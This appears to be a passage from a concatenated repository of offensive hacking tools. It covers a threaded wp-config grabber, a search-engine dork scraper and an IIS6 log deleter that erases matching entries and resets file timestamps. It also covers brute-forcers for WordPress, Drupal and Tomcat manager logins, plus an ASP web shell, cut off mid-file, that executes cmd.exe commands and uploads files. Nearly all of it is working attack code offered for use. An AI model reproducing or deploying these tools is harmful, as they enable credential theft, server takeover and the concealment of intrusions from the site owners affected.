48 | pass 49 | except httplib.BadStatusLine,e: 50 | logger.error("[%s] %s",url,e) 51 | except socket.error, e: 52 | logger.error("[%s] %s",url,e) 53 | #print "Therer was an error: %s" % e 54 | except urllib2.URLError, e: 55 | logger.error("[%s] %s", url,e.reason) 56 | #print "Therer was an error: %s" % e.reason 57 | 58 | def run(self): 59 | while True: 60 | #Get from queue job 61 | host = self.queue.get() 62 | if host: 63 | line = host.strip() 64 | line = line.strip('\n') 65 | site = urlparse.urlparse(line) 66 | name= savepath + site.hostname + '__wp_config.txt' 67 | path = line + payload 68 | self.exp(path,name) 69 | #print self.getName() + ":" + host 70 | self.queue.task_done() 71 | 72 | 73 | 74 | 75 | if __name__ == '__main__': 76 | if os.path.exists(savepath) == False: 77 | os.makedirs( savepath, mode=0777) 78 | start = time.time() 79 | 80 | #Create number process 81 | for i in range(n_thread): 82 | t = ThreadProcess(queue) 83 | t.setDaemon(True) 84 | t.start() 85 | #url list 86 | fr = open('url.txt','r') 87 | for line in fr: 88 | queue.put(line) 89 | queue.join() 90 | fr.close() 91 | end = time.time() 92 | print "It takes about - %.2fs" % (end-start) 93 | 94 | 95 | 96 | 97 | 98 | 99 | -------------------------------------------------------------------------------- /py/google_result.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf-8 3 | #author:youstar 4 | #email:youstar#foxmail.com 5 | import sys,os,urllib,urllib2,string 6 | import re 7 | from htmlentitydefs import name2codepoint 8 | from BeautifulSoup import BeautifulSOAP 9 | 10 | #get domain 11 | def getdomain(url): 12 | patter = 'http(s)?://([\w-]+\.)+[\w-]+' 13 | m = re.match(patter,url) 14 | if m is not None: 15 | return m.group() 16 | #url decode 17 | def html_unescape(str): 18 | def entity_replacer(m): 19 | entity = m.group(1) 20 | if entity in name2codepoint: 21 | return unichr(name2codepoint[entity]) 22 | else: 23 | return 
m.group(0) 24 | def ascii_replacer(m): 25 | cp = int(m.group(1)) 26 | if cp <= 255: 27 | return unichr(cp) 28 | else: 29 | return m.group(0) 30 | 31 | s = re.sub(r'&#(\d+);', ascii_replacer, str, re.U) 32 | return re.sub(r'&([^;]+);', entity_replacer, s, re.U) 33 | #write to file 34 | #---------------------------------------------------------------------- 35 | def writetofile(filename,urltitle): 36 | hfile = open(filename,'w') 37 | for key in urltitle.keys(): 38 | lineurl = "%s\r\n"%(urltitle[key]) 39 | hfile.writelines(lineurl) 40 | hfile.close 41 | #get url link form the result 42 | def geturladdress(keywords,type,number,filename): 43 | urltitle = {} 44 | pageid = string.atoi(number)/100 45 | for idpage in range(0,pageid,1): 46 | entirehtml= getresponse(keywords,type,idpage*100) 47 | soup = BeautifulSOAP(entirehtml) 48 | results = soup.findAll('li', {'class': 'g'}) 49 | for result in results: 50 | title_a = result.find('a') 51 | if not title_a: 52 | continue 53 | else: 54 | title = ''.join(title_a.findAll(text=True)) 55 | title = html_unescape(title) 56 | #print title 57 | url = title_a['href'] 58 | #print url 59 | url = getdomain(url) 60 | urltitle[title]= url 61 | writetofile(filename,urltitle) 62 | #get the response html 63 | def getresponse(keywords,type,number=0): 64 | if type == "google": 65 | data = {} 66 | data['q'] = keywords 67 | data['start'] = number 68 | data['num'] = 100 69 | EnData = urllib.urlencode(data) 70 | #print EnData 71 | ggurl = "http://www.google.com.hk/search" 72 | fullurl = ggurl + "?" + EnData 73 | #print fullurl 74 | ggrequest = urllib2.Request(fullurl) 75 | ggrequest.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)') 76 | ggresponse = urllib2.urlopen(ggrequest) 77 | html = ggresponse.read() 78 | print html 79 | return html 80 | elif type == "baidu": 81 | data = {} 82 | data['wd']=keywords 83 | EnData = urllib.urlencode(data) 84 | baiduurl= "http://www.baidu.com/s?" 
85 | fullurl = baiduurl + EnData 86 | print fullurl 87 | bdresponse = urllib2.urlopen(fullurl) 88 | html = bdresponse.read() 89 | return html 90 | else: 91 | print 'please input the right format' 92 | if __name__=="__main__": 93 | if len(sys.argv)!= 5: 94 | print 'please input the right format' 95 | print 'expamle: spidersearch.py keywords google 3000 export.txt' 96 | else: 97 | keywords = sys.argv[1] 98 | type = sys.argv[2] 99 | number = sys.argv[3] 100 | filename = sys.argv[4] 101 | print 'waiting.....' 102 | geturladdress(keywords,type,number,filename) 103 | print 'success.....' 104 | -------------------------------------------------------------------------------- /vbs/iis6_remove_log.vbs: -------------------------------------------------------------------------------- 1 | If WScript.Arguments.Count < 1 Then 2 | Usage() 3 | WScript.Quit(1) 4 | End If 5 | 6 | Select Case UCase(WScript.Arguments.Item(0)) 7 | Case "LIST" 8 | Call ListWeb() 9 | Case "STOPLOG" 10 | Call SetLog(WScript.Arguments.Item(1),0) '0 stop log 11 | Case "STARTLOG" 12 | Call SetLog(WScript.Arguments.Item(1),1) '1 start log 13 | Case "DELLOG" 14 | Call DelLog(WScript.Arguments.Item(1),WScript.Arguments.Item(2),WScript.Arguments.Item(3)) 15 | Case Else 16 | Call Usage() 17 | End Select 18 | 19 | Sub Usage() 20 | WScript.Echo "IIS 6 Log Deleter By. 
Twi1ight" & vbCrLf 21 | WScript.Echo "Usage:" & vbTab & _ 22 | WScript.ScriptName & " LIST" & vbCrLf & vbTab & _ 23 | WScript.ScriptName & " STARTLOG SiteID" & vbCrLf & vbTab & _ 24 | WScript.ScriptName & " STOPLOG SiteID" & vbCrLf & vbTab & _ 25 | WScript.ScriptName & " DELLOG SiteID LogFile KeyString" & vbCrLf & " " & _ 26 | "LIST" & vbTab & vbTab & "List all websites info" & vbCrLf & " " & _ 27 | "STARTLOG" & vbTab & "Start IIS Logging on SiteID" & vbCrLf & " " & _ 28 | "STOPLOG" & vbTab & "Stop IIS Logging on SiteID" & vbCrLf & " " & _ 29 | "DELLOG" & vbTab & "Automatical stop/start IIS log and delete log items which contains KeyString, KeyString is a Regular String" 30 | 31 | End Sub 32 | 33 | Sub CheckID(ID) 34 | If Not IsNumeric(ID) Then 35 | WScript.Echo "[-] The site ID specified is not Numeric" 36 | WScript.Quit(1) 37 | End If 38 | End Sub 39 | 40 | Sub ListWeb() 41 | Set ObjService=GetObject("IIS://LocalHost/W3SVC") 42 | For Each obj3w In objservice 43 | If IsNumeric(obj3w.Name) Then 44 | sServerName=Obj3w.ServerComment 45 | Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root") 46 | ListAllWeb = ListAllWeb & obj3w.Name & _ 47 | String(Abs(25-Len(obj3w.Name))," ") & _ 48 | obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf 49 | Set objLog = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name) 50 | ListAllWeb = ListAllWeb & String(25," ") & _ 51 | "Log: " & objLog.LogFileDirectory & "\W3SVC" & obj3w.Name &vbCrLf 52 | End If 53 | Next 54 | WScript.Echo ListAllWeb 55 | Set ObjService=Nothing 56 | End Sub 57 | 58 | Sub SetLog(ID, value) 59 | CheckID(ID) 60 | str = "Start" 61 | If value = 0 Then 62 | str = "Stop" 63 | End If 64 | Set objSite = GetObject("IIS://localhost/W3SVC/" & ID) 65 | objSite.Put "LogType",value 66 | objSite.SetInfo 67 | If (Err.Number <> 0) Then 68 | Err.Clear 69 | WScript.Echo "[-] Error Trying To " & str & " IIS Logging!" 70 | Else 71 | WScript.Echo str & " IIS Logging Success!" 
72 | End If 73 | 74 | End Sub 75 | 76 | Sub DelLog(ID, LogFile, KeyString) 77 | On Error Resume Next 78 | Const ForReading = 1, ForWriting = 2, ForAppending = 8 79 | 'WScript.Echo "Delete Log File" 80 | 'Stop Log 81 | Call SetLog(ID, 0) 82 | WScript.Sleep 500 'wait iis to stop log otherwise will raise an exception if rewrite logfile immediately 83 | Set regEx = New RegExp 84 | regEx.Pattern = KeyString 85 | regEx.IgnoreCase = True 86 | 87 | Set fso = CreateObject("Scripting.FileSystemObject") 88 | 'Save Last Modify Time 89 | Set f = fso.GetFile(LogFile) 90 | modifyDate = f.DateLastModified 91 | 'WScript.Echo f.DateCreated & " " & f.DateLastAccessed & " " & f.DateLastModified 92 | 93 | LogPath = fso.GetParentFolderName(LogFile) 94 | LogName = fso.GetFileName(LogFile) 95 | TempFile = fso.GetTempName 96 | SrcFile = LogPath & "\" & TempFile 97 | 98 | 'WScript.Echo TempFile 99 | Call fso.CopyFile(LogFile, SrcFile) 100 | Set srcLog = fso.OpenTextFile(SrcFile, ForReading, False) 101 | Set dstLog = fso.OpenTextFile(LogFile, ForWriting, False) 102 | Do While srcLog.AtEndOfLine <> True 103 | line = srcLog.ReadLine 104 | Set Martches = regEx.Execute(line) 105 | If Martches.Count <> 0 Then 106 | WScript.Echo " "& line 'comment out this line if don't like to display deleted log item 107 | Else 108 | dstLog.WriteLine(line) 109 | End If 110 | Loop 111 | srcLog.Close 112 | dstLog.Close 113 | fso.DeleteFile(SrcFile) 114 | 'Change Last Modify Time 115 | Set objShell = CreateObject("Shell.Application") 116 | Set objFolder = objShell.NameSpace(LogPath) 117 | Set objFolderItem = objFolder.ParseName(LogName) 118 | objFolderItem.ModifyDate = modifyDate 119 | 'WScript.Echo f.DateCreated & " " & f.DateLastAccessed & " " & f.DateLastModified 120 | If (Err.Number <> 0) Then 121 | WScript.Echo "[-] Error Trying To Delete IIS Log!" 
122 | Err.Clear 123 | End If 124 | 'Start Log 125 | Call SetLog(ID, 1) 126 | End Sub 127 | -------------------------------------------------------------------------------- /php/wp_login_bruteforce.php: -------------------------------------------------------------------------------- 1 | <?php 2 | 3 | function get_user() 4 | { 5 | global $host, $path; 6 | $authors = array(); 7 | if ($path == "") $url="http://$host/?feed=rss2"; 8 | $url = "http://$host/$path/?feed=rss2"; 9 | if (@fopen($url, 'r')) { 10 | $res = send_pack($url, 0); 11 | if (preg_match_all('/<dc:creator><\!\[CDATA\[(.*?)\]\]><\/dc:creator>/', $res, $authors)) { 12 | $authors = array_unique($authors[1]); 13 | } else if (preg_match_all('/<dc:creator>(.*?)<\/dc:creator>/', $res, $authors)) { 14 | $authors = array_unique($authors[1]); 15 | } 16 | } else { 17 | for ($i = 1; $i <= 5; $i++) { 18 | $url = "http://$host/$path/?author=$i"; 19 | $res = send_pack($url, 0); 20 | preg_match('/title=\'(.*?)\' rel=\'me\'/i', $res, $users); 21 | $authors[] = $users[1]; 22 | $authors = array_filter($authors); 23 | } 24 | } 25 | return $authors; 26 | } 27 | 28 | 29 | function crack_login($user_arr, $pass_arr) 30 | { 31 | global $host, $path; 32 | if ($path == "") $url="http://$host/wp-login.php"; 33 | $url = "http://$host/$path/wp-login.php"; 34 | $cracked = array(); 35 | foreach ($user_arr as $user) { 36 | echo "current crack user --> ".$user."\n\n"; 37 | $user = iconv('utf-8', 'gbk//IGNORE', $user); 38 | if ($pass_arr == 'same') { 39 | //$post = "log=" . urlencode($user) . "&pwd=" . urlencode($user) . "&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=" . urlencode("http://$host/$path/") . "%2Fwp-admin%2F&testcookie=1"; 40 | $post = "log=" . urlencode($user) . "&pwd=" . urlencode($user) . "&wp-submit=Log+In&redirect_to=" . urlencode("http://$host/$path/") . "%2Fwp-admin%2F&testcookie=1"; 41 | sleep(10); 42 | $res = send_pack($url, $post); 43 | if (strpos($res, 'div id="login_error"') === false) { 44 | echo 'Username :' . 
$user . ' Password :' . $user . "\n\n"; 45 | $cracked[] = $user; 46 | } 47 | } else { 48 | $pass_arr = array_unique($pass_arr); 49 | foreach ($pass_arr as $pass) { 50 | $pass = trim($pass); 51 | //$post = "log=" . urlencode($user) . "&pwd=" . urlencode($pass) . "&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F&testcookie=1"; 52 | $post = "log=" . urlencode($user) . "&pwd=" . urlencode($pass) . "&wp-submit=Log+In&redirect_to=" . urlencode("http://$host/$path/") . "%2Fwp-admin%2F&testcookie=1"; 53 | sleep(10); 54 | $res = send_pack($url, $post); 55 | //fwrite(fopen('a.txt','w'),$res);exit; 56 | if (strpos($res, 'div id="login_error"') === false) { 57 | echo 'Username :' . $user . ' Password :' . $pass . "\n\n"; 58 | } 59 | } 60 | } 61 | } 62 | return $cracked; 63 | } 64 | 65 | function send_pack($url, $post) 66 | { 67 | $ch = curl_init(); 68 | curl_setopt($ch, CURLOPT_URL, $url); 69 | curl_setopt($ch, CURLOPT_HEADER, 0); 70 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 71 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 72 | curl_setopt($ch, CURLOPT_HTTPHEADER, array( 73 | 'User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:27.0) Gecko/20100101 Firefox/27.0;by DarkR4y', 74 | 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 75 | 'Accept-Language: en-US,en;q=0.5' 76 | )); 77 | curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:8888'); //set proxy 78 | if ($post) { 79 | curl_setopt($ch, CURLOPT_POST, 1); 80 | curl_setopt($ch, CURLOPT_POSTFIELDS, $post); 81 | } 82 | $response = curl_exec($ch); 83 | curl_close($ch); 84 | return $response; 85 | } 86 | 87 | 88 | function func_time() 89 | { 90 | list($microsec, $sec) = explode(' ', microtime()); 91 | return $microsec + $sec; 92 | } 93 | 94 | 95 | function load_dict() 96 | { 97 | $a = array(); 98 | $f = fopen('user.txt','r'); 99 | while (!feof($f)) { 100 | $a[] = str_replace(array("\n","\r"),"",fgets($f, 1024)); 101 | } 102 | fclose($f); 103 | return $a; 104 | } 105 | 106 | 
//=========================main================================== 107 | if ($argc < 4) { 108 | print_r(' 109 | +------------------------------------------------------+ 110 | Useage: php ' . $argv[0] . ' host path attack-mode 111 | Host: target server (ip/hostname) 112 | Path: path of wordpress 113 | Nuberic: 1 for same as usr | 2 for pass dict 114 | Example: php ' . $argv[0] . ' localhost /wordpress 1 115 | Example: php ' . $argv[0] . ' localhost /wordpress 2 116 | user.txt for log dict & pass.txt for pwd dict 117 | +------------------------------------------------------+ 118 | '); 119 | exit; 120 | } 121 | $start_time = func_time(); 122 | set_time_limit(0); 123 | error_reporting(7); 124 | if (!extension_loaded('curl')) { 125 | exit('plz enable CURL extention!'); 126 | } 127 | $host = $argv[1]; 128 | $path = $argv[2]; 129 | $type = $argv[3]; 130 | $auth = array(); 131 | //$auth = load_dict(); 132 | $auth = file('user.txt'); 133 | //exit(var_dump($auth)); 134 | 135 | echo 'count(Username): ' . count($auth) . "\n\n"; 136 | //print_r($auth); 137 | if ($type == 1) 138 | { 139 | echo 'Cracking => the password same as username' . "\n\n"; 140 | $cracked = crack_login($auth, 'same'); 141 | }elseif($type == 2) 142 | { 143 | $passwords = file('pass.txt'); 144 | echo 'Cracking => password dict attack' . "\n\n"; 145 | if ($cracked) { 146 | $auth = array_diff($auth, $cracked); 147 | } 148 | crack_login($auth, $passwords); 149 | }else 150 | { 151 | echo "invalid attack mode!\n\n"; 152 | exit(); 153 | } 154 | 155 | echo 'elapsed time: ' . round((func_time() - $start_time), 4) . 's'; 156 | ?> 157 | -------------------------------------------------------------------------------- /py/drupal_bruterforce.py: -------------------------------------------------------------------------------- 1 | """ 2 | Drupalbrute.py 3 | 4 | Author: Justin C. 
Klein Keane <justin@madirish.net> 5 | 6 | """ 7 | import urllib, urllib2 8 | import sys, getopt 9 | 10 | from urllib2 import Request, urlopen, URLError, HTTPError 11 | 12 | global maxrange, target, wordlist, userlist, usernames, passwords, version 13 | passwords = [] 14 | usernames = [] 15 | maxrange = 3 16 | version = 5 17 | 18 | def handle_args(): 19 | global target, wordlist, maxrange, userlist, version 20 | try: 21 | opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "number=", "wordlist=", "target=", "userlist=", "version="]) 22 | except getopt.GetoptError, err: 23 | # print help information and exit: 24 | print str(err) # will print something like "option -a not recognized" 25 | usage() 26 | sys.exit(2) 27 | for o, a in opts: 28 | if o in ("-h", "--help"): 29 | usage() 30 | sys.exit() 31 | elif o in ("-n", "--number"): 32 | maxrange = int(a) 33 | elif o == "--target": 34 | target = a 35 | elif o == "--wordlist": 36 | wordlist = a 37 | elif o == "--userlist": 38 | userlist = a 39 | elif o == "--version": 40 | version = a 41 | else: 42 | assert False, "unhandled option" 43 | 44 | # set up defaults 45 | try: 46 | target 47 | except NameError: 48 | target = 'None' 49 | if target == 'None': 50 | print "You must specify a target!" 51 | usage() 52 | sys.exit() 53 | 54 | try: 55 | wordlist 56 | except NameError: 57 | wordlist = 'None' 58 | if wordlist == 'None': 59 | print "You must specify a wordlist!" 
60 | usage() 61 | sys.exit() 62 | 63 | try: 64 | userlist 65 | except NameError: 66 | userlist = 'None' 67 | 68 | def usage(): 69 | print "Usage: drupalbrute.py [--number=max number of user ids] [--target=target URL] [--wordlist=file] [--userlist=file] [--version=6 (5 is default)]" 70 | 71 | def read_passwords(): 72 | global wordlist, passwords 73 | f = open(wordlist, 'r') 74 | for line in f: 75 | passwords.append(line) 76 | if len(passwords) == 0: 77 | usage() 78 | sys.exit() 79 | 80 | def read_userlist(): 81 | global userlist, passwords 82 | f = open(userlist, 'r') 83 | for line in f: 84 | usernames.append(line.strip()) 85 | if len(usernames) == 0: 86 | usage() 87 | sys.exit() 88 | 89 | def discover_users(): 90 | global target, usernames, maxrange 91 | for i in range(1,maxrange): 92 | try: 93 | target 94 | except NameError: 95 | target = 'None' 96 | 97 | if target == 'None': 98 | usage() 99 | sys.exit() 100 | url = target + "/?q=user/" 101 | request_url = url + str(i) 102 | try: 103 | #print "Trying " + request_url 104 | response = urllib2.urlopen(request_url) 105 | the_page = response.read() 106 | uname_start = the_page.find('User account</a></div>') 107 | uname_start = the_page.find('<h2>', uname_start) + 4 108 | if uname_start > 17: 109 | uname_end = the_page.find('</h2>', uname_start) 110 | #print the_page[uname_start:uname_end] 111 | usernames.append(the_page[uname_start:uname_end]) 112 | except HTTPError, e: 113 | error = 'Error at ' + request_url + ' ' + str(e.code) 114 | 115 | handle_args() 116 | read_passwords() 117 | if (userlist == 'None'): 118 | discover_users() 119 | else: 120 | read_userlist() 121 | print "Please wait, working..." 
122 | 123 | # Brute force the account 124 | if version < 6: 125 | if len(usernames) > 0: 126 | for user in usernames: 127 | for passw in passwords: 128 | data = { 129 | 'name': user, 130 | 'pass': passw, 131 | 'form_id': 'user_login' 132 | } 133 | urldata = urllib.urlencode(data) 134 | url = target + "/?q=user" 135 | results = urllib.urlopen(url, urldata).read() 136 | if results.find('Sorry, unrecognized username or password.') == -1: 137 | print user + ":" + passw.strip() 138 | else: 139 | print "Drupal 6" 140 | # get a copy of the form first 141 | url = target + "/?q=user" 142 | formid = '' 143 | try: 144 | response = urllib2.urlopen(url) 145 | the_page = response.read() 146 | formid_start = the_page.find('name="form_build_id"') 147 | if (formid_start < 0): 148 | print "Sorry, can't find form_build_id field" 149 | sys.exit() 150 | formid_start += 25 151 | formid = the_page[formid_start:formid_start+37] 152 | except HTTPError, e: 153 | error = 'Error at ' + request_url + ' ' + str(e.code) 154 | if len(usernames) > 0: 155 | for user in usernames: 156 | print "Cracking ... 
" + user 157 | for passw in passwords: 158 | data = { 159 | 'name': user, 160 | 'pass': passw, 161 | 'form_build_id': formid, 162 | 'form_id': 'user_login', 163 | 'op': 'Log in' 164 | } 165 | urldata = urllib.urlencode(data) 166 | url = target + "/?q=user" 167 | results = urllib.urlopen(url, urldata).read() 168 | if results.find('Sorry, unrecognized username or password.') == -1: 169 | print user + ":" + passw.strip() 170 | -------------------------------------------------------------------------------- /py/tomcat_crack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # Functions: Idenfy tomcat password 4 | # Code By BlAck.Eagle 5 | 6 | import threading, time, random, sys, urllib2, httplib, base64 7 | from copy import copy 8 | import re 9 | from collections import defaultdict, deque 10 | 11 | 12 | class Tomcatbrute(threading.Thread): 13 | def __init__(self,server,port,path,user,password): 14 | threading.Thread.__init__(self) 15 | self.host = str(server) 16 | self.port = str(port) 17 | self.path = str(path) 18 | self.user = str(user) 19 | self.password = str(password) 20 | self.userAgent = "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" 21 | 22 | 23 | def writeresult(self,record): 24 | fp = open('Result.html','a+') 25 | fp.writelines(record+'') 26 | fp.close() 27 | 28 | def run(self): 29 | #union = self.user+':'+self.password 30 | auth = base64.b64encode('%s:%s' % (self.user, self.password)).replace('\n', '') 31 | #flag = Verificate.HttpRequest().verificate(self.host,self.port,self.path) 32 | #if (flag): 33 | #print 'This is a Tomcat!' 34 | #print base64.b64encode(union) 35 | 36 | print self.getName(), "-- created." 
37 | 38 | try: 39 | h = httplib.HTTP(self.host,self.port) 40 | h.putrequest('GET', self.path) 41 | 42 | h.putheader('Host', self.host+':'+self.port) 43 | h.putheader('User-agent', self.userAgent) 44 | h.putheader('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8') 45 | h.putheader('Accept-Language','en-us') 46 | h.putheader('Accept-Encoding','gzip, deflate') 47 | 48 | 49 | #h.putheader('Authorization', 'Basic %s' % base64.b64encode(union)) 50 | h.putheader('Authorization', 'Basic %s' %auth) 51 | #print auth 52 | h.endheaders() 53 | 54 | statuscode, statusmessage, headers = h.getreply() 55 | #print "Response: ", statuscode, statusmessage 56 | #print "Headers: ", headers 57 | #print data 58 | #print headers['Authorization'] 59 | #print response.read() 60 | #print response.status 61 | #print statuscode 62 | print headers['Server'] 63 | 64 | if (re.findall(r'Coyote',headers['Server'])): 65 | if statuscode==200: 66 | print headers['Server'] 67 | print "\t\n[OK]Username:",self.user,"Password:",self.password,"\n" 68 | self.writeresult(self.host+":"+self.user+":"+self.password+"\n") 69 | else: 70 | print "\t\nThis is not Tomcat\n" 71 | else: 72 | pass 73 | #print "\t\n[X]Wrong username or password!\n" 74 | except : 75 | #print "An error occurred:", msg 76 | pass 77 | def timer(): 78 | now = time.localtime(time.time()) 79 | return time.asctime(now) 80 | 81 | 82 | 83 | if __name__ == '__main__': 84 | if len(sys.argv) !=5: 85 | print "\nUsage: ./TomcatBrute.py <urlList> <port> <userlist> <wordlist>\n" 86 | print "ex: python TomcatBrute.py ip.txt 8080 users.txt wordlist.txt\n" 87 | sys.exit(1) 88 | 89 | try: 90 | users = open(sys.argv[3], "r").readlines() 91 | except(IOError): 92 | print "Error: Check your userlist path\n" 93 | sys.exit(1) 94 | 95 | try: 96 | words = open(sys.argv[4], "r").readlines() 97 | except(IOError): 98 | print "Error: Check your wordlist path\n" 99 | sys.exit(1) 100 | 101 | try: 102 | port = sys.argv[2] 103 | except(IOError): 
104 | print "Error: Check your port\n" 105 | 106 | path = '/manager/html' 107 | 108 | WEAK_USERNAME = [p.replace('\n','') for p in users] 109 | WEAK_PASSWORD = [p.replace('\n','') for p in words] 110 | #WEAK_USERNAME = ['tomcat','user'] 111 | #WEAK_PASSWORD = ['tomcat','user'] 112 | accounts =deque() #list数组 113 | 114 | for username in WEAK_USERNAME: 115 | for password in WEAK_PASSWORD: 116 | accounts.append((username,password)) 117 | 118 | #print len(accounts) 119 | #server = sys.argv[1] 120 | 121 | 122 | 123 | host_open = open(sys.argv[1], 'r') 124 | ip = [p.replace('\n','') for p in host_open] 125 | for server in ip: 126 | print "[+] Server:",server 127 | print "[+] Port:",port 128 | print "[+] Users Loaded:",len(WEAK_USERNAME) 129 | print "[+] Words Loaded:",len(WEAK_PASSWORD) 130 | print "[+] Started",timer(),"\n" 131 | 132 | for I in range(len(accounts)): 133 | work = Tomcatbrute(server,port,path,accounts[I][0],accounts[I][1]) 134 | work.setDaemon(1) 135 | work.start() 136 | time.sleep(0.1) 137 | print "\n[-] Done -",timer(),"\n" 138 | -------------------------------------------------------------------------------- /vbs/cmd.asp.vbs: -------------------------------------------------------------------------------- 1 | <%@ Language="VBScript" %> 2 | <% 3 | Dim theComponent(7) 4 | theComponent(0) = "Scripting.FileSystemObject" 5 | theComponent(1) = "WScript.Shell" 6 | theComponent(2) = "WScript.Shell.1" 7 | theComponent(3) = "WScript.Network" 8 | theComponent(4) = "WScript.Network.1" 9 | theComponent(5) = "shell.application" 10 | theComponent(6) = "shell.application.1" 11 | Function IsObjInstalled(strClassString) 12 | On Error Resume Next 13 | IsObjInstalled = False 14 | Err = 0 15 | Dim xTestObj 16 | Set xTestObj = Server.CreateObject(strClassString) 17 | If -2147221005 <> Err Then 18 | IsObjInstalled = True 19 | Else 20 | IsObjInstalled = False 21 | End if 22 | Set xTestObj = Nothing 23 | Err = 0 24 | End Function 25 | %> 26 | <tr><td>支持组件:</td></tr> 27 | <% 28 
| Dim i 29 | For i=0 to UBound(theComponent)-1 30 | If IsObjInstalled(theComponent(i)) Then 31 | Response.Write "<tr><td>" & theComponent(i) & "</td><td><font color=""green"">√</font></td></tr>" & vbCrLf 32 | Else 33 | Response.Write "<tr><td>" & theComponent(i) & "</td><td><font color=""red"">×</font></td></tr>" & vbCrLf 34 | End if 35 | Next 36 | %> 37 | 38 | 39 | 40 | <object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> 41 | <object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> 42 | <% 43 | sub ShowErr() 44 | If Err Then 45 | jb"<a href='javascript:history.back()'>" & Err.DescrIption & "</a>" 46 | Err.Clear:Response.Flush 47 | ENd IF 48 | End SUB 49 | function jb(Str) 50 | Response.WRItE(Str) 51 | END function 52 | Sub mbd(Str) 53 | execute(Str) 54 | END Sub 55 | Function rePATH(S) 56 | REpath=REpLAcE(s,"\","\\") 57 | ENd Function 58 | FuNctIon RRepaTh(S) 59 | RREpaTH=rEplAcE(S,"\\","\") 60 | end fUncTion 61 | Url=REQueSt.sErVErvARiables("URL") 62 | nimajbm=requESt.sErVeRVArIABlEs("LOCAL_ADDR") 63 | AcTIoN=ReQUESt("Action") 64 | RooTpATH=SeRveR.mAPpaTH(".") 65 | WWWROOt=SErVER.MAppATH("/") 66 | sba=request.servervariables("http_host") 67 | appbd=rEQUEsT.seRvErVARIaBLES("PATH_INFO") 68 | FOLdErpAth=REqueSt("FolderPath") 69 | ScrName=Request.ServerVariables("Script_Name") 70 | fNAME=reQUesT("FName") 71 | ServerU=ReQueST.SERVervaRIables("http_host") 72 | WoriNima=Request.ServerVariables("SERVER_NAME") 73 | O0O0=Request.ServerVariables("PATH_TRANSLATED") 74 | WoriNiba=Request.ServerVariables("SERVER_SOFTWARE") 75 | Worininai=Request.ServerVariables("LOCAL_ADDR") 76 | jbmc=Request.ServerVariables("NUMBER_OF_PROCESSORS") 77 | jbmb=Request.ServerVariables("OS") 78 | SI="<table border='0' cellpadding='0' cellspacing='0' align='center'>" 79 | SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>" 80 | 
SI=SI&"<tr><td>" 81 | SI=SI&"上传路径:<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\Cmd.exe")&"' size='40'>" 82 | SI=SI&" <input name='LocalFile' type='file' size='25'>" 83 | SI=SI&" <input type='submit' name='Submit' value='上传'>" 84 | SI=SI&"</td></tr></form></table>" 85 | on error resume next 86 | if request("sp")<>"" then session("shellpath") = request("sp") 87 | shellpath=session("shellpath") 88 | if shellpath="" then shellpath = "cmd.exe" 89 | if request("cmd")<>"" then session("defcmd") = request("cmd") 90 | defcmd=session("defcmd") 91 | if defcmd="" then defcmd="set" 92 | if request("rwpath")<>"" then session("rwpath") = request("rwpath") 93 | rwpath=session("rwpath") 94 | if rwpath="" then rwpath=server.mappath(".") 95 | si="<form method='post'>" 96 | rp1="<input type=""radio"" name=""cmdtype"" value=""" 97 | si=si&"cmd:<input name='sp' value='"&shellpath&"' style='width:35%'> 回显:<input name='rwpath' value='"&rwpath&"' style='width:35%'>" 98 | si=si&"<input type='hidden' name='action' value='Cmd1Shell'>" 99 | si=si&rp1&"wscript"" checked>wscript" 100 | si=si&rp1&"wscript.shell"">wscript.shell" 101 | si=si&rp1&"wscript.shell.1"">wscript.shell.1" 102 | si=si&rp1&"shell.application"">shell.application" 103 | si=si&rp1&"shell.application.1"">shell.application.1" 104 | si=si&"<input name='cmd' style='width:92%' value='"&defcmd&"'> <input type='submit' value='执行'>" 105 | 106 | set fso=server.createobject("scripting.filesystemobject") 107 | sztempfile = rwpath&"\cmd.txt" 108 | select case request("cmdtype") 109 | case "wscript" 110 | set cm=server.createobject("wscript.shell") 111 | set dd=cm.exec(shellpath&" /c "&defcmd) 112 | aaa=dd.stdout.readall 113 | si=si&"<text"&"area style='width:100%;height:440;' class='cmd'>" 114 | si=si&aaa 115 | si=si&chr(13)&"</text"&"area></form>" 116 | case "wscript.shell","wscript.shell.1" 117 | on error resume next 118 | set ws=server.createobject(request("cmdtype")) 119 | call ws.run (shellpath&" /c " & defcmd & " > " 
